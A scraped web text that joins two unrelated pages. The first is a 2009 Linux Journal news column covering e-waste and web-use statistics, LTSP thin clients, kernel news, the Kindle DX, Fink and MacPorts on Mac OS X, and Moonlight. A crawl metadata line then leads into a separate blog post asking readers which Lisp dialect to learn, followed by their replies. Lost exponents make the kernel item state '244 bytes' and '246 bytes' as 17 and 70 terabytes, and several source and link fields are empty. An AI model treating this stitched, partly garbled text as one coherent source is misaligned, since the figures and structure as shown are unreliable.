- Mac OS X, It's Not Linux, but It's Close
- WebcamStudio—Create Your Own On-line Video Show
- They Said It
- LinuxJournal.com
- Non-Linux FOSS
LJ Index, September 2009
1. Percent of all waste that is e-waste: 2
2. Percent of the heavy metals in landfills that come from e-waste: 70
3. Number of separate elements found in e-waste: 38
4. Percent of e-waste bound for recycling that actually gets recycled: 20
5. Average number of electronic items purchased per American household per year: 24
6. Average number of books read per year by adults in the US: 4
7. Percent of adults in the US that read zero books per year: 25
8. Number of hours the average American spends watching TV per day: 4
9. Number of years spent watching TV during a 65-year life: 9
10. Average time someone in the US spends Web surfing each month: 27:38:58
11. Average time someone in France spends Web surfing each month: 19:16:28
12. Average time someone in Spain spends Web surfing each month: 17:52:43
13. Average time someone in the UK spends Web surfing each month: 17:36:55
14. Average time someone in Germany spends Web surfing each month: 17:00:35
15. Average time someone in Italy spends Web surfing each month: 15:02:36
16. Average time someone in Australia spends Web surfing each month: 14:30:16
17. Percent of local advertisers on search engines that choose not to renew: 50
18. Percent of local advertisers on advertising sites that choose not to renew: 60
19. US National Debt as of 06/08/09, 10:51:06am MST: $11,403,815,042,547.90
20. Change in the debt since last month's column: $152,944,501,331.18
1–3: EPA
4: Basel Convention
5: Consumer Electronics Association
6, 7: Washington Post
8: A.C. Nielsen Co.
9, 20: Math
10–16: Telegraph.co.uk
17, 18: The Business Insider
19:
Why Buy a $350 Thin Client?
On August 10, 2009, I'll be at a conference in Troy, Michigan, put on by the LTSP (Linux Terminal Server Project,) crew and their commercial company (). The mini-conference is geared toward people considering thin-client computing for their network. My talk will be targeting education, as that's where I have the most experience.
One of the issues network administrators need to sort out is whether a decent thin client, which costs around $350, is worth the money when full-blown desktops can be purchased for a similar investment. As with most good questions, there's really not only one answer. Thankfully, LTSP is very flexible with the clients it supports, so whatever avenue is chosen, it usually works well. Some of the advantages of actual thin-client devices are:
Setup time is almost zero. The thin clients are designed to be unboxed and turned on.
Because modern thin clients have no moving parts, they very seldom break down and tend to use much less electricity compared to desktop machines.
Top-of-the-line thin clients have sufficient specs to support locally running applications, which takes load off the server without sacrificing ease of installation.
They look great.
There are some advantages to using full desktop machines as thin clients too, and it's possible they will be the better solution for a given install:
Older desktops often can be revitalized as thin clients. Although a 500MHz computer is too slow to be a decent workstation, it can make a very viable thin client.
Netbooks like the Eee PC can be used as thin clients and then used as notebook computers on the go. It makes for a slightly inconvenient desktop setup, but if mobility is important, it might be ideal for some situations.
It's easy to get older computers for free. Even with the disadvantages that come with using old hardware, it's hard to beat free.
Thankfully, with the flexibility of LTSP, any combination of thin clients can coexist in the same network. If you're looking for a great way to manage lots of client computers, the Linux Terminal Server Project might be exactly what you need. I know I couldn't do my job without it.
diff -u: What's New in Kernel Development
Rik van Riel has doubled and doubled again the amount of RAM that can be directly addressed in the x86 64-bit architecture. The previous limit had been 244 bytes, or more than 17 terabytes. The new limit is 246 bytes, or more than 70 terabytes.
The Linux Pulse Per Second (LinuxPPS) Project has had to reset and restart, when Udo van den Heuvel asked why the code hadn't been accepted, and neither Andrew Morton nor Alan Cox could remember any of the objections anyone had against it. They both recommended resubmitting the patches, which at the very least would get the folks who still had problems with the code to speak up again. LinuxPPS is a project to provide a character-device-based API for communication between kernel space and userspace. Rudolfo Giometti took Alan and Andrew's advice a couple weeks later, submitting the core LinuxPPS code for inclusion—the idea being to get everyone signed off on the basic features before introducing any code that might be more controversial. He also pointed out that all previous objections had been fixed, or that the objectors already had agreed the fix could wait. So, it looks like a good thing that Udo asked about this initially, or the perfectly good code might be lingering still.
The XCEP motherboards from IskraTel now are supported in Linux, which is cool, because that motherboard is used in many particle accelerators throughout the world. Michael Abbot recently submitted patches adding this architecture, which runs an ARM XScale PXA255 CPU.
DebugFS soon may be configurable in much more powerful ways. Steven Rostedt has added a feature to enable tracing events defined in a whole directory tree. The previous version required that each event be enabled individually in its own directory. The current version recurses through all child directories, but it also allows users to chop off branches of that directory tree easily if they so desire. What's the cost of all this power? It's no longer easy to identify which tracing events are enabled and which are not, because an event may be controlled by configurations elsewhere in the directory tree. But, as Steven said during the discussion, the information is all there, and a script easily could identify all configured events. As far as the debate went, no one seemed to feel the cons outweighed the pros, so this probably will be accepted into the kernel in the near future.
One thing that doesn't happen often is a hardware vendor asking for advice from the Linux community about how to code its drivers. But, Atul Mukker from LSI Corporation recently did exactly that. He said LSI wanted to take a whole new approach to driver writing, in which it had operating-system-independent code at the core, with a thin layer of support for Linux, Windows and so on. And, he just wanted to know if anyone had any advice. Turns out several folks did—one of the main ones being Jeff Garzik. Jeff recommended Intel's networking drivers as excellent examples of good practice. He suggested modularizing the code so that each piece of hardware would have its own codebase, which also could be kept free of any operating-system-specific code. He also recommended keeping general-purpose code out of the driver entirely, where other drivers could use it more easily. The Application Binary Interface (ABI), Jeff said, also should remain consistent with other drivers already in the kernel. Any feature similar to something found elsewhere should imitate that other interface. Any features that were unique, on the other hand, could create whatever interface seemed best.
Hardware Requirements: None
In two days, I'll be the proud owner of a Kindle DX. That may seem a bit odd, considering how much I despise DRM. The real selling point for me, however, is that it will read PDF files natively, and in full size. As I was looking for the system requirements for the Kindle DX (naively thinking it might sport Linux support), I was amused to see the hardware requirements listed: none.
The Kindle is designed as a self-contained piece of hardware, never needing to connect to a computer. Because it actually mounts as a USB removable device, it will work just fine under Linux. But, more interesting for me is that it never needs to sync at all. And, that got me thinking about my other electronic devices. I have two smartphones that I never connect to a computer. They both have the ability to sync with a computer, but because they're connected to the Internet, I never have had the need to connect them directly to a computer.
Will hardware compatibility fade away into the past? It wouldn't be a bad thing, unless, of course, proprietary hardware drivers are replaced with proprietary network protocols. Luckily, Linux is king on the Internet, so we're much more likely to keep standards in place on-line than in the hands of Windows-savvy developers.
My Kindle DX might have the taint of DRM, but thankfully, it also has support for non-DRM files as well. Although it has support for the non-free Windows operating system, it also supports Linux. And heck, it will run just fine all by itself. I figure that's because it's running Linux as its underlying OS.
Mac OS X, It's Not Linux, but It's Close
In the past, the Mac OS was a fairly unique entity, not having much in common with other OSes, such as Windows or UNIX, which made cross-platform work a bit convoluted. However, the advent of the latest incarnation of the Mac OS, called OS X or Darwin, provides a very comfortable alternative for Linux geeks. Because Darwin is based on BSD UNIX, it is possible to use POSIX-compliant applications on the Mac.
Apple provides a package called Xcode on its developer site. Xcode has the necessary tools for compiling programs on the Mac, and it includes a nice graphical IDE and lots of examples for developing applications for OS X. Xcode is based on the GNU toolset, providing tools like gcc, libtool, make and so on. That means, with Xcode, most command-line applications can be compiled and run on the Mac. So, a simple little hello world program:
#include <stdio.h> #include <stdlib.h> int main (int argc, char **argv) { printf("Hello World\n"); }
compiles fine with gcc, giving you an executable that prints out “Hello World” on the command line. Basically, anything that is POSIX-compliant should compile and run with no issues.
Getting graphical programs to run can be a bit more involved. Mac OS X does provide an X server and all the standard development libraries you would need for a pure X11 application, like Xlib. However, none of the other standard libraries, like GTK or Qt, are available by default. You have to download, compile and install them yourself, which works fairly well, but you have to choose the correct configuration options and collect all the required dependencies. But, you shouldn't need to go through so much pain. Two projects in active development provide some form of package management for GNU software: Fink and MacPorts. Using these, getting and installing GNU software is as easy to do as it is with most Linux distros.
The Fink Project started in 2001 and is based on the Debian package management system, so you can use the Debian package tools like dpkg, dselect and apt-get, making it familiar for Debian-based distro users. Once the base installation is done, you can start to install packages. If you like a text-based manager, use dselect (Figure 1). If you prefer a graphical manager instead, use the following command to get synaptic (Figure 2):
sudo apt-get install synaptic
Using these applications, you can install many of the packages you are familiar with in Linux. The package count, at the time of this writing, is 10,872.
However, not all packages are available as a binary install using these tools. For that class of packages, Fink installs them directly from source, compiling and installing on your Mac. So, for example, if you want to install gramps and do some genealogy work, execute the following:
sudo fink install gramps
Even installing from source, Fink deals well with dependency issues, because it still is based on the Debian package management system.
The MacPorts Project started in 2002 and models itself after the BSD port packaging system. Thus, you use the command to manage the packages on your system. Once you have done the base install, you can install other software packages simply by running the command:
sudo port install stellarium
Several graphical interfaces are available as well, such as Porticus. However, those typically are independent projects, as opposed to the Debian tools available in Fink. As such, their development cycle and behavior tend to be a bit more erratic and unstable than the older and more mature Debian tools. But still, they may be exactly what you're looking for if you prefer a graphical interface. Like the Fink Project, both binary packages and source packages are available. There are 5,829 packages available in the MacPorts Project.
Both projects provide access to the full wealth of open-source applications that has been available to Linux users, and the number of packages provided by both projects continues to grow.
Once you have one, or both, of these projects installed (they will coexist on your system), you will have all the tools necessary to do your own code development. I have used anjuta (Figure 3) on my MacBook to develop some small GNOME applications. These compile and run equally well on my MacBook and my Netbook running Ubuntu. Although there isn't binary compatibility between OS X and Linux, with source compatibility, it is (at least in theory) simply a matter of recompiling for the other system.
Running Mac OS X code on Linux is not as easy as running Linux code on Mac OS X. The real stumbling block is the graphical interface called Quartz on the Mac OS. Although the kernel and most of the command-line tools have been released as open-source software, Quartz still is closed. At the time of this writing, I could not find any references to a reverse-engineered, open-source replacement for Quartz. So the only option available is running OS X inside a virtual machine. Although this is not technically running Mac applications on Linux, it does provide the ability to run OS X on a Linux box.
Apple Developer Connection: developer.apple.com
Open-Source Apple:
Fink Project:
MacPorts Project:
WebcamStudio—Create Your Own On-line Video Show
A few months back, Linux Journal had a live streaming show called, “Linux Journal Live”. It aired once a week and streamed via ustream.tv. One of the frustrating things about running the show was that it was very difficult to get the “studio” feel using Linux. As it happened, we ended up using a Macintosh computer and the freeware CamTwist in order to embed graphics, guest hosts and text.
If we ever resurrect the live show, now we'll be able to stream from our dearly beloved Linux, thanks to the open-source project, WebcamStudio (webcamstudio.sourceforge.net). WebcamStudio allows Linux users to stream Webcams, graphics, text and much more to sites like ustream.tv. If you've ever wanted to try your hand at a live show, be sure to check it out.
They Said It
We're done with the first 80%, and well into the second 80%.
—Larry Wall, referring to Perl 6
Doing linear scans over an associative array is like trying to club someone to death with a loaded Uzi.
—Larry Wall
I don't have to write about the future. For most people, the present is enough like the future to be pretty scary.
—William Gibson
In Cyberspace, the First Amendment is a local ordinance.
—John Perry Barlow
LinuxJournal.com
As we read this month's coverage of cross-platform development, I thought I'd weigh in on the Web development end of things. While I work toward a new-and-improved iteration of LinuxJournal.com, I must constantly consider the needs of users with widely varying operating system and browser configurations. LinuxJournal.com visitors are a technologically diverse bunch. As you might expect, the majority of our Web visitors view LinuxJournal.com with Firefox, but what may surprise you is that a slight majority of those Firefox users are browsing from a Windows machine. Linux and Firefox users are nipping at their heels though. What also may surprise you is the percentage of visitors browsing with some version of Internet Explorer. Granted, that percentage has decreased during the last couple years, but the most recent numbers show about 20% of traffic coming from IE users, down from around 30% a year ago. Other browsers like Chrome, Opera and Safari have a small but important constituent as well, which makes my job just a little more interesting. So, to all of you visiting us from a less-used browser, I am doing my very best to give you the same great experience as the Firefox majority, and to all of those using IE, well, you may drive me to drink. I still welcome you though, and I will do my best to accommodate!
Non-Linux FOSS
Moonlight is an open-source implementation of Microsoft's Silverlight. In case you're not familiar with Silverlight, it's a Web browser plugin that runs rich Internet applications. It provides features such as animation, audio/video playback and vector graphics.
Moonlight programming is done with any of the languages compatible with the Mono runtime environment. Among many others, these languages include C#, VB.NET and Python. Mono, of course, is a multiplatform implementation of ECMA's Common Language Infrastructure (CLI), aka the .NET environment.
A technical collaboration deal between Novell and Microsoft has provided Moonlight with access to Silverlight test suites and gives Moonlight users access to licensed media codecs for video and audio. Moonlight currently supplies stable support for Silverlight 1.0 and Alpha support for Silverlight 2.0.
Silverlight Pad Running on Moonlight | http://www.linuxjournal.com/magazine/upfront-18?quicktabs_1=2 | CC-MAIN-2015-11 | refinedweb | 3,139 | 62.58 |
Shell Drop Handlers are DLLs that are registered in the system to extend the drag and drop functionality in the Shell. You can use these extensions to allow files to become drop targets for other files, or use the standard drag and drop functionality to invoke your own business logic. In this article I will show you how to create a Drop Handler extension using .NET and a library called SharpShell.
The Drop Handler we'll create will allow the user to drag XML files onto an XSD file, and validate the contents of the XML files against the XSD schema. Here's how it'll look.
Above: Here we drag two XML files over an XSD file - the extension kicks in and shows the visual cue 'Link'.
Above: The user releases the mouse and the extension validates the XML files against the XSD, displaying the results in a dialog.
This article is part of the series '.NET Shell Extensions'.
First, create a new C# Class Library project.
Tip: You can use Visual Basic rather than C# - in this article the source code is C# but the method for creating a Visual Basic Shell Extension is just the same.
In this example we'll call the project 'XsdDropHandler'. Rename the 'Class1.cs' file to 'XsdDropHandler.cs', and add a reference to the SharpShell library (it is available as a NuGet package named 'SharpShell').
Now that we've set up the project, we can derive the XsdDropHandler class from SharpDropHandler. SharpDropHandler is the base class for Drop Handler Shell Extensions - it provides all of the COM plumbing and interop needed - we just implement a couple of abstract members to provide the business logic. We also mark the class as visible to COM, and use SharpShell's COMServerAssociation attribute to associate the handler with the '.xsd' file extension. So here's how your class should look:

[ComVisible(true)]
[COMServerAssociation(AssociationType.ClassOfExtension, ".xsd")]
public class XsdDropHandler : SharpDropHandler
{
DragEnter
protected abstract void DragEnter(DragEventArgs dragEventArgs);
DragEnter is called when the user has selected some shell items and dragged them over the shell item that you register the extension for (so in our case, this will happen when the user drags anything over an XSD file). In this function, you must check the dragged items (available via the DragItems property) and set the dragEventArgs.Effect to indicate which drag operation (copy, move, link and so on) is allowed.
Drop
protected abstract void Drop(DragEventArgs dragEventArgs);
Drop is called when the user releases the mouse and the actual functionality needs to be invoked. DragEventArgs are provided in case you need to see things like the keys being pressed or the mouse position.
In our example, we'll open up our validation form in this function.
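As a small aside (this is not part of the sample, just an illustration), the DragEventArgs.KeyState bit field is how you would inspect the modifier keys during a drop; in the WinForms convention, bit 4 is SHIFT and bit 8 is CTRL:

```csharp
using System;

public static class DragKeys
{
    // WinForms DragEventArgs.KeyState is a bit field:
    // 1 = left mouse button, 2 = right button, 4 = SHIFT, 8 = CTRL, 32 = ALT.
    public static bool IsShiftHeld(int keyState) => (keyState & 4) != 0;
    public static bool IsCtrlHeld(int keyState) => (keyState & 8) != 0;
}
```

A handler could use a check like this to, say, offer a 'copy' effect normally and a 'link' effect while CTRL is held.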
As described, DragEnter is just going to allow the 'link' effect if EVERY drag file is an XML file. Here's the code:
/// <summary>
/// Checks what operations are available for dragging onto the target with the drag files.
/// </summary>
/// <param name="dragEventArgs">The <see cref="System.Windows.Forms.DragEventArgs"/> instance containing the event data.</param>
protected override void DragEnter(DragEventArgs dragEventArgs)
{
// Check the drag files - if they're all XML, we can validate them against the XSD.
dragEventArgs.Effect =
DragItems.All(di => string.Compare(Path.GetExtension(di), ".xml", StringComparison.InvariantCultureIgnoreCase) == 0)
? DragDropEffects.Link : DragDropEffects.None;
}
This is straightforward enough not to need too much explanation. We use the Linq statement 'All' to verify a condition on every path (that the extension is xml), if this is true we set the drag effect to link.
Drop is even more straightforward - we'll pass the paths to the form.
Tip: Remember that for a SharpDropHandler, the dragged files are stored in the property 'DragFiles' and the object we're dragging over is stored in the property 'SelectedItemPath'.
/// <summary>
/// Performs the drop.
/// </summary>
/// <param name="dragEventArgs">The <see cref="System.Windows.Forms.DragEventArgs"/> instance containing the event data.</param>
protected override void Drop(DragEventArgs dragEventArgs)
{
// Create the validator output form.
var validatorOutputForm = new ValidationOutputForm {XsdFilePath = SelectedItemPath, XmlFilePaths = DragItems};
validatorOutputForm.ShowDialog();
}
In this function, we pass the xsd path (which is the SelectedItemPath property) and the xml paths (the DragItems property) to our ValidationOutputForm, which we'll build next.
Here you can see how straightforward it is to implement the core business logic for the extension.
I'm not going to go into too much detail here - the code is in the XsdDropHandler sample in the source code. This is essentially a very simple WinForms form that shows a list of validation results, the validation results come from using an XmlReader to read the XML files, validating against the provided schema file.
There are just a few things left to do. First, we must add the ComVisible attribute to our class. This because our class is a COM server and must be visible to other code trying to use it.
ComVisible
[ComVisible(true)]
public class XsdDropHandler : SharpDropHandler, ".xsd")]
public class XsdDropHandler : SharpDropHandler
So what have we done here? We've told SharpShell that when registering the server, we want it to be associated with XSD file classes in the system.
You can associate with files, folders, classes, drives and more - full documentation on using the association attribute is available on the CodePlex site at COM Server Associations.
We're done! Building the project creates the XsdDropHandler assembly, which can be registered as a COM server to add the extension to the system, allowing you to drag XML files onto an XSD file to validate them against the schema. XsdDropHandler.dll file. You can also drag the server into the main window. Selecting the server will show you some details on it. Select the server.
Now most SharpShell servers can be tested directly inside this application by selecting them and choosing 'Test Shell' - however, at this stage at least, Shell Drop Handlers cannot be tested in this way. There is another mechanism - press 'Test Shell' to open the test shell, then choose 'Shell Open Dialog'.
Once the shell open dialog has opened, you can drag and drop files over the XSD. If you attach a debugger to the Server Manager, you can debug directly into your extension. Remember that you have to Register the server before you can test it.
You can check the 'Installing and Registering the Shell Extension' section of the .NET Shell Extensions - Shell Context Menus for details on how to install and register these extensions - the process. | http://www.codeproject.com/Articles/529515/NET-Shell-Extensions-Shell-Drop-Handlers?fid=1824881&df=90&mpp=10&sort=Position&spc=Relaxed&select=4480253&tid=4476166 | CC-MAIN-2016-22 | refinedweb | 1,013 | 54.02 |
This is a blog about being a reinvigorated programmer. So it’s ironic that the most successful articles so far (at least in terms of number of hits) have been about The Good Old Days — Whatever happened to programming? and Programming the Commodore 64 being two examples.
One possible response to this would be to change the blog title to The Nostalgic Programmer, but I’m not going to do that — despite what you might think from what I’ve been writing, I am actually looking forwards more than backwards, and there are plenty of things I am excited about right now, including Ruby, refactoring, REST, Rails and even some things that don’t begin with R. Lisp, for example (although I guess I could have squeezed that into the R-list by substituting “recursion-based languages” or somesuch).
I’ve been promising since the second meaningful entry on this blog to learn Lisp, and it’s time to get started seriously. But before I do, I have an important choice to make:
Which Lisp?
Perhaps because of its very long history (it was first specified in 1958), Lisp has become horribly fragmented, and exists in far more mutually incompatible dialects than any other language. Not only that, but most of the dialects have multiple incompatible implementations, too, so you can’t just “learn Lisp” in the sense that you “learn Perl”. You have to pick one.
And that’s where I’m asking your help. I know that some of you out there have a lot of experience with Lisp, or rather, Lisps, and I’d really appreciate your input as I try to make this initial decision.
People generally say that the two principal dialects that you have to choose between are Common Lisp (big, kinda ugly, has comprehensive libraries) and Scheme (small, elegant, deficient in libraries) — and that the former is the best choice if you want to actually get stuff done but the latter is better for educational purposes. On that basis, my bias is towards a Scheme: I don’t particularly expect to use Lisp for any of my actual work (although if it turned out that I did, that would be a bonus), but I want to learn it primarily to become a better programmer.
There’s a third option as well, though: Emacs Lisp. GNU Emacs has been my primary editor since 1987, and I don’t see that changing any time soon. So knowing Emacs Lisp would be of more immediate practical value to me than either Common Lisp or Scheme. Does that seem like a reasonable path to take?
Which Scheme?
Also, supposing I choose Scheme: that still leaves the question of which implementation. Looking at the list of packages provided by the operating system of the computer that I’m writing this on (Ubuntu GNU/Linux 9.10), I see:
That’s a lot of choice. And on my other computer, running MacOS ports, I am offered even more:
Even if I narrow it down to the versions that are easily available on both platforms, that still leaves MIT Scheme, mzscheme, and scheme48. How do I choose between these?
Help me, Internet: you’re my only hope.
P.S. No thanks, I don’t want to learn Haskell instead
Nor Erlang, nor Clojure, nor OCaml, nor any of the other more whizzy and spiffy modern functional languages. I am sure they are all great, and have many important advantages over Boring Old Lisp; but at this stage, I want to start with foundations, and that means the language from 1958, not one of these fashionable arrivistes.
Their time will come.
PLT Scheme is available natively as an app bundle on OSX. Mzscheme is just PLT Scheme without the IDE and the GUI libraries. I wouldn’t recommend using it.
I would definitely choose PLT, there are schemes offering better performance, but no other offers the same library breadth and quality.
PLT Scheme is a great option, it (and the IDE DrScheme) is the variant used in the excellent book How to Design Programs.
This combination of book and scheme dialect is often compared to the even more famous book “Structure and Interpretation of Computer Programs” which uses MIT Scheme.
Depending on how you learn one or the other may better suit you. The differing approaches have been written about in a paper called “The Structure and Interpretation of the Computer Science Curriculum” available at
The language that you’re looking for, Lisp from 1958 is probably more similar to to LISP 1.5 than to more modern languages like Common Lisp or Scheme.
Being Schemer myself, I of course also prefer Scheme to CL. Before beginning to learn Scheme you should be aware that the current Scheme “standard” R6RS is now well adapted in the community and while there are a number of high-quality R6RS implementations, many are going to stay with R5RS and maybe migrate to R7RS.
Whether you choose R5RS or R6RS does not make that much of a difference, though, both have the standard documents and TSPL3 or TSPL4. Though I’d recommend you to choose a Scheme that is in active development like Mz, Larceny, Ikarus, Mosh, Guile, Gambit-C or Bigloo, preferably with an active mailing list where you can (and especially in the beginner-phase should) ask questions.
Personally, I use PLT Scheme (Mz), but keep in mind that PLT, while being a good implementation it has really a lot extensions to Scheme which turn PLT more into a Scheme dialect on its own than a Scheme implementation. Still, it has the most extensive documentation and a friendly mailing list.
I would certainly recommend plt scheme for it’s libraries and ide.
If you want something smaller (extension language) then you might prefer guile.
I’d definitely encourage at least giving Clojure a try — it’s a non-Common Lisp, non-Scheme Lisp-1 (i.e. functions and values share the same namespace, unlike Common Lisp’s weird approach) focused towards concurrent programming. Closest thing to Haskell I’ve seen in a dynamic language — infinite sequences, optional lazy evaluation, etc. And amazingly scalable.
If you really want Lisp as it was in 1958. Then my Lithp project could use some more core implemented. Have fun! ;-)
Clojure; ’nuff said.
On a more serious note, Clojure is _the_ Lisp to learn today.
It’s pragmatic, amazingly well designed, has some great concepts and runs really fast.
Note: Ex-professional Common Lisp programmer and Scheme hobbyist here. Switched to Clojure for real world programming last year and haven’t looked back since.
So, Michel S. and Baishampayan Ghose, you’re telling me that Clojure IS a Lisp? In the same sense that Jython is a version of Python, or are you making a fuzzier statement along the lines that, say, C++ could be argued to be a version of C?
Clojure, definitely. It’s a modern Lisp which actually has a concurrency story. And you’ll enjoy the gazillions of Java libraries that you can immediately use.
“And you’ll enjoy the gazillions of Java libraries” … I’m not sure whether I’d consider that a feature or a bug.
(Don’t worry, I’m only joking. Probably. Mostly. HHOS.)
Common Lisp and Scheme were each standardized (separately) in the 1990s, emerging from a sort of Cambrian explosion of lisp dialects in the decades before. As lisps, they are vastly different from the prototypical and long-obsolete language of 1958, and even each other. Subsequent incarnations of these dialects (in the form of implementations, libraries, and updated standards) serve to distinguish them ever more.
While CL or Scheme are well-defined, the question of what makes a lisp in the general sense (or how any individual dialect measures up) is rather nebulous, and probably of little consequence.
Clojure’s lispy nature is strong, but still different. In some ways it is arguably a logical advancement of the lisp idea, perhaps as Common Lisp or Scheme were (for examples, see Clojure’s generalized sequences, and also its quotation semantics.) Intuitively, Clojure is obviously a lisp.
That said, you would do well to begin learning any of these three dialects. It might not matter which you started with, because I’d wholly recommend exploring all of them; their differences make this approach worthwhile, while their similarities make it easier on the whole. :-)
Emacs Lisp will be immediately more useful, but may prove to be less enlightening in the long-term. (Incidentally, I began this way, and in hindsight I would rather have learned Common Lisp first.)
If it helps, I have written some advice relevant to learning Common Lisp, here: — some of it may apply to other dialects too.
Lisp closest to the spirit of 1958 is just the newcomer: Clojure. Like others revolutions, is based in a back to the essence of roots.
Scheme did it in 70’s, but Clojure is doing now.
To put it nice and short: Take a look at all of them (CL, Scheme, Clojure). They are all worth knowing, and you won’t be able to make a choice until you have at least played a little with all of them.
Because you’re an Emacs user, and probably don’t care much about IDEs like DrScheme, a selling point for CL might be SLIME. Yes, you can also use Cljure and some Scheme dialects from within slime, but so far nothing beats SLIME+CL. Since you will (if you follow my suggestion) learn about all those Lisps anyway, maybe you should go with the one that is best supported in your environment of coice.
As far as Emacs Lisp is concerned: Plowing through (info “(eintr)”) is something that can be done in a weekend. That won’t make you an Emacs guru, but it’ll suffice to get started. Emacs Lisp might not be the greatest language on earth, but as an Emacs user, you’ll really benefit from it.
You shouldn’t view Lisp as a language with various dialects — but as a family of related languages. It’s old enough that “dialects” like Emacs Lisp and Common Lisp are pretty different languages. In particular, Scheme is itself something that should be considered a family of languages in its own right, all related by a very small core specification.
As for the choice of a language to learn, my obvious choice would be PLT Scheme — obvious since I’m one of the PLT hackers… But to get a little more focused on the question of a language to learn, PLT has good documentation (docs.plt-scheme.org), including materials that are intended for learning the language, not just reference manual. For example, the first few entries on the documentation page are guides that are tutorial-like documents that will quickly introduce you to the language, including systems programming and working with the bundled web server (which has enough features that you could certainly use to get some “real work” done with it). These are also included with most PLT Scheme installations (and for that I recommend using our installers over the outdated version that you’d find in Ubuntu…). In addition to these, there is the HtDP textbook (htdp.org) that uses PLT Scheme (but this might be too slow for your taste) and the well known SICP — which can be a lot of fun but is outdated in several places. (If you do choose PLT and read through SICP, then see the support for it at — it would simplify going through the book.)
And about the choice of Scheme or Common Lisp or Emacs Lisp or Clojure — Scheme, and in particular PLT Scheme comes with a unique set of features that makes it very easy to extend the language in a way that no other Lisp dialect can do. But unsurprisingly, this is not something you’d run into as a beginner. Emacs Lisp might be useful to learn if you live in Emacs, but from a new language point of view it doesn’t have much to offer. Clojure can be very modern in some aspects (like concurrency, and its approach to data structures), yet in others it is disappointingly the same as older lisps (unhygienic macros, dynamically scoped variables, tail calls) — but saying so will probably lead to some flames… Comparing Common Lisp to (any) Scheme leads to even more flames — so it’s probably best to just skim through a bunch of sites yourself and choose one. Learning one of these is a much better use of time than reading through such flames…
If you do decide to take a closer look at Clojure (which I strongly encourage), there’s a couple of resources I’d like to recommend.
The official web site is. Browsing around a bit will give you an idea of language, how it’s like and unlike other Lisp dialects.
Stuart Halloway’s book ‘Programming Clojure’ is an excellent survey of the language.
Finally, no Lisp discussion these days seems complete without a link to this cartoon:
Why do you poo-poo Clojure, but you are considering Scheme? They’re both dialects of LIsp.
I know you have some weird deal about “getting back to the roots” of 1958, but Common Lisp is not the language of 1958. Common Lisp is the language of the 80’s or whenever it was ANSI standardized. Lisp (aka Lisp 1) and Common Lisp are different animals. I don’t even know if you can find a 1958 Lisp anywhere, and even if you did, why would you want it? It’s not going to eliminate any complexity or make things simpler. In fact it would be *worse*. This isn’t a case of first principles, it’s a case of a horse and buggy (*barely*) vs. a car with an engine and 4 wheels and all the rest of the bits you need to make it a useful transportation device.
On the CL “dialect”/”which to learn” thing, I think you are confusing the language itself with libraries that you might find in some commercial implementations like Franz AllegroCL. The only reason you have to “pick one” is if you want to come out the gate with a ton of library support. They all implement the CL Hyperspec (the ANSI standard), and yeah maybe there are “extras” but these are usually in the form of macros, not extensions to the language itself. The situation is really no different than it is with any C compiler vendor. You get their compiler, and you get their libraries. Write to the spec/standard libraries (defined in the CL Hyperspec), and voila you have portable code. Use somebody else’s socket library and voila, now you have a dependency. How is that different from C? It’s not a language thing, it’s a library thing.
Finally, don’t lump Clojure in with the ASCII art functional languages, or those abominations of pointless complexity like Haskell. Clojure is a Lisp dialect, period, end of story. It’s a well-designed language on a good platform (the JVM). You should consider learning it.
I think this is one of those times when it’s best to start with the most modern thing and then go backwards to learn the culture, where the ideas came from, etc. Start in 1958, and you will most likely give up from sheer frustration before you reach 2010. Good luck.
I’m just glad you didn’t mention AutoLISP.
A general comment to you all: many thanks for what you’ve contributed to this discussion so far. I’m find it very informative, not to mention just plain fun.
foo asked: “Why do you poo-poo Clojure, but you are considering Scheme”. For a very good reason: because of ignorance. I’d not realised that Clojure is a Lisp, but, rather, had it down as one of what foo amusingly calls “ASCII art functional languages”. I know better now, and Clojure is on my radar.
Everyone, please keep the comments coming! I’m sure there is lots more to learn.
You might want to look at this CL/Scheme comparison:
PicoLisp is the one I chose after looking at but not getting into CL, PL kicks ass.
What you can do with it:
You might be running a different Ubuntu GNU/Linux 9.10 than I am, but somehow, I get the impression that your list of available Scheme-implementations only include those where “scheme” is part of the package name…
Of those you mention as available for MacOS, the “universe” repositories appear to include at least chicken (chicken-bin), elk, gambit (gambc) and gauche…
And there’s also scm, guile (guile-1.8, guile-1.6), stalin and scsh…
Arild, you are completely right: not knowing the names of all the other scheme implementations, I only looked at packages whose names contain the string “scheme”. It wasn’t meant to be an exhaustive list!
I guess it’s good that those eight other Schemes are also available …
Ugh.
foo, you said “I don’t even know if you can find a 1958 Lisp anywhere”. Well, you could try McCarthy’s original paper, which implements a Lisp interpreter in Lisp. That’s the oldest I know of, although Lisp is older than the paper: eval was a relatively late addition.
At the risk of being horribly flamed and fed to the trolls, have you considered newlisp? ()
To understand the most basic core of Lisp, it helps to start with Paul Graham’s complete demonstration of the mathematical basis of Lisp in a dozen pages, The Roots Of Lisp (note: in PostScript). It is strongly recommended. McCarthey’s fifty-year-old paper is good, too, but not exactly what you want unless you like history. Steele and Gabriel’s history is nice also if you really do want history.
Paul Graham’s On Lisp is free to download and an excellent somewhat advanced manual.
Common Lisp, Scheme, and Clojure are all fine and have many similarities. I like them all. The brilliant Lisp macro system is available for almost all of them, though some Schemes prefer the toy ‘hygenic’ macro system that is much less powerful.
Don’t forget to use EMACS Lisp and GIMP Scheme scripting, too. I wrote my first Lisp code in the GIMP.
Emacs Lisp, for sheezy. It’s great for getting started as a hobbyist / dabbler. Some of the comments above seem to assume you want to focus maniacally on Emacs (versus playing around with it and seeing if you like it).
Advantages of Emacs Lisp: fully integrated environment with great browseable docs, debugger, and a complete app to work on and extend (ie. Emacs itself). Plus, you already have it!
Some ancient Elisp code I wrote (for illustrative use only :)
Having had Eli as a teacher at NEU and learning PLT Scheme from Eli and Matthias, I can say that PLT Scheme is an elegant language with great extensibility. I do not believe you’ll miss out from not using the MIT Scheme and maybe you’ll even gain a few things. :)
If you go with Scheme, you can enjoy working through The Little Schemer, which is a really fun (and funny, and concise) book. I know you’re a fan of actual printed books, and this one deserves to be a classic.
As for implementation, I arbitrarily chose Guile because it was already installed. Like you, I wasn’t trying to get anything in particular done, I was just hoping to learn something. Guile has some minor syntactic differences from the examples in the book, but nothing I couldn’t work out easily.
(It was also fun to poke around in the interpreter and see how many functions you define in the book are shipped with guile.)
If you are not so hung up on being ‘real standard lisp’, and you use a mac, have a look at impromptu
It gives a nice environment for using scheme for both graphics and sound.
After reading these comments all I can add is; Oh. My. God.
Pingback: The long-overdue serious attempt at Lisp, part 2: is Lisp just too hard? « The Reinvigorated Programmer
IANALP (I am not a lisp programmer), although I have read on it and do want to learn it. What about Paul’s new flavor arc?
